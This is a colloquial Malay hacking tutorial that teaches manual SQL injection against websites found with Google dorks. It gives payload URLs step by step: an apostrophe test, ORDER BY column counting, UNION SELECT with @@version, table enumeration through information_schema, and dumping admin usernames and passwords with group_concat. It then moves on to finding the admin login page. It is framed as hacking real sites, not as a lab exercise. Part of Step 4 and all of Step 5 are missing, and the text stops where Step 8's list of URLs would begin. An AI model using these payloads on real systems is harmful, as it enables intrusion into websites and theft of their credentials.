Step 2:Periksa sama ada webs itu adalah Vulnerable(Boleh di-hack) atau tidak
mudah jer. misal nyer kite dah pilih webs yg vuln yg kte pilih dari google dork td adalh ini:
http://www.victimsite.com/index.php?id=2
jadi, cre nyer cume tmbah (') sahaje tanpa jarak dan kurungn dibelakg url td.. contoh nyer:
http://www.victimsite.com/index.php?id=2'
jika telah tmbh (') tp page yg sme dipaparkan, mknenyer webs tu tidak boleh di-hack.. tp kalu dia paparkan page yang lain misalnyer page error ker or page laen yng berkaitan dengn sql, maka webs tuh vulnerable.. hehe..
...............................
Step 3:Mencari bilangan kolum
step ni pon senang lah jugak.. cre nyer cume tambah dibelakag url td dengn nih order by[n] .....
[n] akan ditukar kpd nilai nombor 1,2,3,... ... Contoh:
http://www.victimsite.com/index.php?id=2 order by 1 http://www.victimsite.com/index.php?id=2 order by 2 http://www.victimsite.com/index.php?id=2 order by 3 http://www.victimsite.com/index.php?id=2 order by 4
buat binatang nih dari nombor 1 sampai kepada nombor yg mendapat page error... contoh nyer..:
http://www.victimsite.com/index.php?id=2 order by 1(noerror) http://www.victimsite.com/index.php?id=2 order by 2(noerror) http://www.victimsite.com/index.php?id=2 order by 3(noerror) http://www.victimsite.com/index.php?id=2 order by 4(noerror) http://www.victimsite.com/index.php?id=2 order by 5(noerror) http://www.victimsite.com/index.php?id=2 order by 6(noerror) http://www.victimsite.com/index.php?id=2 order by 7(noerror) http://www.victimsite.com/index.php?id=2order by 8(error)
page yg pertama hingga ke 7 adlah mempunyai kolum.. ini bermakne webs ini mempunyai 7 kolum..
kadangkala... tidak semue website boleh terime command order by[n] .... jadi korg boleh cube comand yang nih.. order by[n]-- .... contoh:
http://www.victimsite.com/index.php?id=2 order by 1--
................
Step 4:Mencari kolum yang Vulnerable
dalam step ini.. kite akn gunekn command ini union select[no. kolum :1, 2, 3, ..--] dan tukarkan no id= kepada nilai negatif (-).. contoh:
dalam step ini.. kite akn menambah command "version()" ,... apa yg perlu lkukan adalah gunekan semula command step yg ke-4 tetapi tukarkan kolum 3 kepada version()... contoh:
http://www.victimsite.com/index.php?id=-2and1=2 union select1,2,unhex(hex(@@version)),4,5,6,7--
............................
Step 6:Mencari nama tables
okeh.. skrg ade skill utk lakukn step nih.. yg pertame kalu versi nyer adalah 5 dan ke atas.. tukar kn nilai kolum 3 kepada ni group_concat(table_name) dan tmbahkan dibelakag url command ni from information_schema.tables where table_schema=database() .... contoh:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7from information_schema.tables where table_schema=database()--
dan ia akan memaparkan seperti berikut:
dan sekrg.. pilih kolum admin..
Jika versi nyer adlah 4 dan kebawah.. korg kene teke sendiri nme table tuh.. n.. part versi 4 ke bawah yg paling aku bosan sekali... haizzz...
.....................................
Step 7:Mencari nama kolum
sekrg... tukar kn command group_concat(table_name) kepada group_concat(column_name) dan tukarkan from information_schema.tables where table_schema=database() kepada FROM information_schema.columns WHERE table_name=mysqlchar-- ...
seterusnyer.. kite kene tukarkn string MySql CHAR() dengn mysqlchar.
CariMysqlChar()untukTablename:
bukak addon korg.. perge ke sql>Mysql>MysqlChar()
nnt akn keluar 1 popup kecil pastu korg cume msok kn jer slh stu nme kolum yg korg jumpe tadi.. aku pilih admin..
skrg temptkn group_concat(column_name) kpd group_concat(name kolum,0x3a,name kolu lain) dan tukarkan from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110) kepada from table_name
contohnyer:
http://www.victimsite.com/index.php?id=-2 and 1=2union select1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7from admin--
kadangkala ia paprkn yg kolum tidak dijumpai.. so korg kene cube kolum yg lain..
tp.. skrg.. ia akn paparkan password dan username sekali... Cheers...
Step 8: Mencari admin login
dalam step nih.. cre korg nk crik admin login cume kene try 1 per 1 url yg kt bawah nih...